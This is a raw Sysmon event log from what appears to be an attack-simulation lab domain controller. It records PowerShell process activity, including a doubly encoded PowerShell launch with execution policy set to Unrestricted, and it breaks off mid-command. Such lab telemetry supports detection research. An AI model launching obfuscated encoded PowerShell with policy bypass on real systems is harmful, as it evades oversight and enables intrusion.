UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:00.388{266CAFBE-6440-6064-D802-00000000AD01}4220\PSHost.132616656003269239.4220.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.372{266CAFBE-6440-6064-D802-00000000AD01}4220ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0q2sstgb.mbw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.372{266CAFBE-6440-6064-D802-00000000AD01}4220ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vmht4nqj.n2w.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.372{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vmht4nqj.n2w.ps12021-03-31 12:00:00.372 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.357{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.341{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.341{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.341{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-6440-6064-D702-00000000AD01}25084904C:\Windows\system32\cmd.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBA